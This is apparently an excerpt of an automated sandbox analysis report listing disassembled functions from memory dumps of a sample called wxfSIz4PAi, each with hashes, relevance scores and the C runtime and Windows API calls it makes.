Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 7c604cf6cfdb4f040104d3bf2d572cb7ab82ad6c4c731e111b1b9ffafdfff707
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 9191787210D0A349DB2D863E893943EFFE2AA421A171A17DED4F3CB1C5EE1CE954D620

Uniqueness

Uniqueness Score: -1.00%

Function 0040C191 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 5975a2af078c28816f01fe1301a8b7dceccd13c1e98c5dc0dc8573345ea9f6ce
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 219186722180A38AD72D437984B403FFFE15A513A131A07BFD4F2DA6C1EE38C555A628

Uniqueness

Uniqueness Score: -1.00%

Function 05B6C6B3 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 3a903006dba860a8977ece2f444d1af55c821ff29ea3203191e1b59032d9efd4
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: D191677310D0A34ADB69867E857443DFFE2AA421A171A07DED4F2CB1C5EE1CE964D620

Uniqueness

Uniqueness Score: -1.00%

Function 0040C44C Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 21e6ce72fb18376f8c9c0177a15a08f5feb8af2f21d081aaa92a013857dedb9e
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 0F9179761080A38ADB29473985B403FFFE15A523A131A0BBFD4F2DB2C5EE38D555E624

Uniqueness

Uniqueness Score: -1.00%

Function 05B6C131 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: af0ac7b9af554bb12abcdc3adc0b428afe9db77673e54655316bb3be25954aed
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 5191547320D0A34ADB6D467E947443DFFE2AA421A171A07DED4F3CB1C5EE28E9649620

Uniqueness

Uniqueness Score: -1.00%

Function 0040BECA Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 69778eac300dd1c10c594cbe57f4f6eadb7335fd5fb69c830af9f3d407440417
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 3F9158722080A389D729477D897447FFFE19A513A131A07BFD4F2DB2C1EE388554DA68

Uniqueness

Uniqueness Score: -1.00%

Function 05B6BE87 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 2ccc2eb4f670f454c0ec46af87c94f38df20cd74bbed59f7a84a080b37bba72d
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: D081357220D0A349DB6D863E857443EFFF2BA412A171A07DED4F2CB1D5EE28E5549A20

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC20 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 2607aabaea6df519b2dd372ead2d1238015a119bad60f1980fa744d4abdc4045
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: D38186722080A34AEB294639847447FFFE1DE513A131A07BFD4F2DA2C1EF38855596AC

Uniqueness

Uniqueness Score: -1.00%

Function 040F54B3 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1985953400.00000000040F5000.00000040.00000020.00020000.00000000.sdmp, Offset: 040F5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40f5000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 48fcd24739efd809226944d50d5747ead5df71206d7195a77cc277b730b4ef37
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: DC11CE72340100AFD740DF55DC94FA673EAEB88724B298069EE08DB712E675F802CB60

Uniqueness

Uniqueness Score: -1.00%

Function 05B60D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 5fb5662c0881b5a530a597c0c07e39e05140bee6fa8575176e796b07bc480be3
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: C101F276A006089FDF21EF21C809FBE33E5FB86206F0541E4D90B97281E378B8418F80

Uniqueness

Uniqueness Score: -1.00%

Function 05B721D1 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05B72241
_free.LIBCMT ref: 05B72257
_free.LIBCMT ref: 05B72268
_free.LIBCMT ref: 05B72279
_free.LIBCMT ref: 05B72290
GetCPInfo.KERNEL32(?,?), ref: 05B722D8

Part of subcall function 05B7B3B5: _free.LIBCMT ref: 05B7B420

_free.LIBCMT ref: 05B72484
_free.LIBCMT ref: 05B72497
_free.LIBCMT ref: 05B724A5
_free.LIBCMT ref: 05B724B0
_free.LIBCMT ref: 05B724F2
_free.LIBCMT ref: 05B724FA
_free.LIBCMT ref: 05B72502
_free.LIBCMT ref: 05B7250A
_free.LIBCMT ref: 05B72518

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
Instruction ID: 85fae22f7d8188fb7ad4ae3c1274dc4a8fc6c58e5757f727e641af9e5f495b07
Opcode Fuzzy Hash: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
Instruction Fuzzy Hash: D6B19F75E002099FDB21DFB9C884BAEF7F5FF08300F5440ADE9A5A7251EB35A9419B60

Uniqueness

Uniqueness Score: -1.00%

Function 00411F6A Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00411FDA
_free.LIBCMT ref: 00411FF0
_free.LIBCMT ref: 00412001
_free.LIBCMT ref: 00412012
_free.LIBCMT ref: 00412029
GetCPInfo.KERNEL32(?,?), ref: 00412071

Part of subcall function 0041B14E: _free.LIBCMT ref: 0041B1B9

_free.LIBCMT ref: 0041221D
_free.LIBCMT ref: 00412230
_free.LIBCMT ref: 0041223E
_free.LIBCMT ref: 00412249
_free.LIBCMT ref: 0041228B
_free.LIBCMT ref: 00412293
_free.LIBCMT ref: 0041229B
_free.LIBCMT ref: 004122A3
_free.LIBCMT ref: 004122B1

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
Instruction ID: 6ca6d0b646c7f0fe038b25a88f0b1b8239ef077873d54ac3d67d72be22f80314
Opcode Fuzzy Hash: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
Instruction Fuzzy Hash: 40B1B071900309AFDB20DFA5C941BEEBBF5BF08304F14416EF959E7242D7B9A8918B64

Uniqueness

Uniqueness Score: -1.00%

Function 05B7F788 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 05B7F7CC

Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EB38
Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EB4A
Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EB5C
Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EB6E
Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EB80
Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EB92
Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EBA4
Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EBB6
Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EBC8
Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EBDA
Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EBEC
Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EBFE
Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EC10

_free.LIBCMT ref: 05B7F7C1

Part of subcall function 05B76501: HeapFree.KERNEL32(00000000,00000000,?,05B7F288,?,00000000,?,00000000,?,05B7F52C,?,00000007,?,?,05B7F920,?), ref: 05B76517
Part of subcall function 05B76501: GetLastError.KERNEL32(?,?,05B7F288,?,00000000,?,00000000,?,05B7F52C,?,00000007,?,?,05B7F920,?,?), ref: 05B76529

_free.LIBCMT ref: 05B7F7E3
_free.LIBCMT ref: 05B7F7F8
_free.LIBCMT ref: 05B7F803
_free.LIBCMT ref: 05B7F825
_free.LIBCMT ref: 05B7F838
_free.LIBCMT ref: 05B7F846
_free.LIBCMT ref: 05B7F851
_free.LIBCMT ref: 05B7F889
_free.LIBCMT ref: 05B7F890
_free.LIBCMT ref: 05B7F8AD
_free.LIBCMT ref: 05B7F8C5

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction ID: 7a4769feeb49fe682ef4287071732a9a45b588056a28501cd9f8dfde2abd5b7b
Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction Fuzzy Hash: 42313931A0460DDFEB31AB78D888B7A77E9FF00210F1444A9E469D7150EF32F9819625

Uniqueness

Uniqueness Score: -1.00%

Function 0041F521 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0041F565

Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8D1
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8E3
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8F5
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E907
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E919
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E92B
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E93D
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E94F
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E961
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E973
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E985
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E997
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E9A9

_free.LIBCMT ref: 0041F55A

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041F57C
_free.LIBCMT ref: 0041F591
_free.LIBCMT ref: 0041F59C
_free.LIBCMT ref: 0041F5BE
_free.LIBCMT ref: 0041F5D1
_free.LIBCMT ref: 0041F5DF
_free.LIBCMT ref: 0041F5EA
_free.LIBCMT ref: 0041F622
_free.LIBCMT ref: 0041F629
_free.LIBCMT ref: 0041F646
_free.LIBCMT ref: 0041F65E

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction ID: 663e15b0dde773794ed22c5679a1a820cae4c96c2080e6077b97fe37dff8eac1
Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction Fuzzy Hash: D5316C71500300AFEB20AE7AE805B9773E9FF44318F11446BE849C7262DA79E8D68A18

Uniqueness

Uniqueness Score: -1.00%

Function 0041E9B2 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041E9FA
_free.LIBCMT ref: 0041EA1E
_free.LIBCMT ref: 0041EA2B
_free.LIBCMT ref: 0041EA50
_free.LIBCMT ref: 0041EA5D
_free.LIBCMT ref: 0041EA66
_free.LIBCMT ref: 0041ED44
_free.LIBCMT ref: 0041ED4C

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
Instruction ID: 835e439df6746d9e4a645f0e3ab6fafaf2a1d36bb3e8ca10982b002e8b7a98f5
Opcode Fuzzy Hash: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
Instruction Fuzzy Hash: 12C15476D40204BBDB20DFA9CC43FDA77F8AF48744F15416AFE05EB282E67499818794

Uniqueness

Uniqueness Score: -1.00%

Function 00423226 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042422F), ref: 00423249

Strings

log10, xrefs: 00423293, 004232E3
exp, xrefs: 0042330E, 00423370
acos, xrefs: 004233C1
/BB, xrefs: 0042342E
asin, xrefs: 004233B5
log, xrefs: 004232EF, 004232FB
pow, xrefs: 0042332D, 004233D9, 004233EC
sqrt, xrefs: 004233CD

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: DecodePointer
String ID: /BB$acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-1021189420
Opcode ID: 630b55b5aee0cdac9947df96942a2c518d9551f2e4122bfaff5c71f9b894d309
Instruction ID: 713dac25a3a6b9e2a85c2ced730dd83283c3aaa7dc4d76372812c5e21a3eb3ad
Opcode Fuzzy Hash: 630b55b5aee0cdac9947df96942a2c518d9551f2e4122bfaff5c71f9b894d309
Instruction Fuzzy Hash: C2514F71B00529CBDB10DF58F9485ADBBB0FF49315FE041A6D881A6264CB7D8B2AC72D

Uniqueness

Uniqueness Score: -1.00%

Function 05B76E8C Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05B76EA0

Part of subcall function 05B76501: HeapFree.KERNEL32(00000000,00000000,?,05B7F288,?,00000000,?,00000000,?,05B7F52C,?,00000007,?,?,05B7F920,?), ref: 05B76517
Part of subcall function 05B76501: GetLastError.KERNEL32(?,?,05B7F288,?,00000000,?,00000000,?,05B7F52C,?,00000007,?,?,05B7F920,?,?), ref: 05B76529

_free.LIBCMT ref: 05B76EAC
_free.LIBCMT ref: 05B76EB7
_free.LIBCMT ref: 05B76EC2
_free.LIBCMT ref: 05B76ECD
_free.LIBCMT ref: 05B76ED8
_free.LIBCMT ref: 05B76EE3
_free.LIBCMT ref: 05B76EEE
_free.LIBCMT ref: 05B76EF9
_free.LIBCMT ref: 05B76F07

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction ID: 15711257d70694a07246d10daf6088b033aec266cbc99b28d3cb5042ccdf636b
Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction Fuzzy Hash: 4811B376A1050CBFCB12EFA5C845CD93BA5EF04354B4184A5FA188F235EA32FE50EB81

Uniqueness

Uniqueness Score: -1.00%

Function 00416C25 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00416C39

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 00416C45
_free.LIBCMT ref: 00416C50
_free.LIBCMT ref: 00416C5B
_free.LIBCMT ref: 00416C66
_free.LIBCMT ref: 00416C71
_free.LIBCMT ref: 00416C7C
_free.LIBCMT ref: 00416C87
_free.LIBCMT ref: 00416C92
_free.LIBCMT ref: 00416CA0

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction ID: bc4a8488de18622ef43ac097d779123cba2550ccea22c0c0e46fff27a6ede036
Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction Fuzzy Hash: B611BC75100118BFDF01FF95D952DD93B65EF48358B42849AFD084F122D635EE919B44

Uniqueness

Uniqueness Score: -1.00%

Function 05B61417 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05B6141C
std::_Lockit::_Lockit.LIBCPMT ref: 05B6142E
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 05B6146B

Part of subcall function 05B680E1: _Yarn.LIBCPMT ref: 05B68100
Part of subcall function 05B680E1: _Yarn.LIBCPMT ref: 05B68124

std::bad_exception::bad_exception.LIBCMT ref: 05B6148C
__CxxThrowException@8.LIBVCRUNTIME ref: 05B6149A
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 05B614BD
std::_Lockit::~_Lockit.LIBCPMT ref: 05B6152E

Strings

n~B, xrefs: 05B61417

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
String ID: n~B
API String ID: 835844855-2489732092
Opcode ID: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
Instruction ID: 11d9b9c1493863cd1ffbce285330b4e1eced9c340ce1bb4b63f487dc89cacbf7
Opcode Fuzzy Hash: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
Instruction Fuzzy Hash: 86316F71905B44DFC731AF29D84465AFBF4FF58610B208AAFE09A92A40CB78B601CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004011B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004011B5
std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204

Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD

std::bad_exception::bad_exception.LIBCMT ref: 00401225
__CxxThrowException@8.LIBVCRUNTIME ref: 00401233
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7

Strings

bad locale name, xrefs: 0040121D

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
String ID: bad locale name
API String ID: 835844855-1405518554
Opcode ID: 63e05c14b460d685efbaffe237daf51259fe89ad88eb658e1c08f97622123781
Instruction ID: 0603089b66b0b819d6eff5d75331a99d5985645afad82bc6fef42f715fc6e5ae
Opcode Fuzzy Hash: 63e05c14b460d685efbaffe237daf51259fe89ad88eb658e1c08f97622123781
Instruction Fuzzy Hash: E0319131904B40DEC7319F6AD941A5BFBF0BF08710B508A7FE05AA3A91C738B904CB59

Uniqueness

Uniqueness Score: -1.00%

Function 05B79514 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
Instruction ID: 44ec4426671bd1f2684a2d52c23f77a9f53b7c55b631342135f6ba09e4656b90
Opcode Fuzzy Hash: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
Instruction Fuzzy Hash: AFC18E74E0824DAFDB11DFA8C884BADBBB5FF09320F0841D5E965AB391C734A941CB65

Uniqueness

Uniqueness Score: -1.00%

Function 05B74CB1 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 05B76F80: GetLastError.KERNEL32(?,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B76F84
Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FB7
Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FF8
Part of subcall function 05B76F80: _abort.LIBCMT ref: 05B76FFE

_memcmp.LIBVCRUNTIME ref: 05B74F5B
_free.LIBCMT ref: 05B74FCC
_free.LIBCMT ref: 05B74FE5
_free.LIBCMT ref: 05B75017
_free.LIBCMT ref: 05B75020
_free.LIBCMT ref: 05B7502C

Strings

C, xrefs: 05B74E19

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
Instruction ID: e4df20b6d9b139644259dda7ac61ec895de3453a5a8b232b97474c7b891fd016
Opcode Fuzzy Hash: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
Instruction Fuzzy Hash: CEB13875A016199FDB24DF28C888AADB7B5FF08305F5045EAD96AA7350E731BE90CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00414A4A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

_memcmp.LIBVCRUNTIME ref: 00414CF4
_free.LIBCMT ref: 00414D65
_free.LIBCMT ref: 00414D7E
_free.LIBCMT ref: 00414DB0
_free.LIBCMT ref: 00414DB9
_free.LIBCMT ref: 00414DC5

Strings

C, xrefs: 00414BB2

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
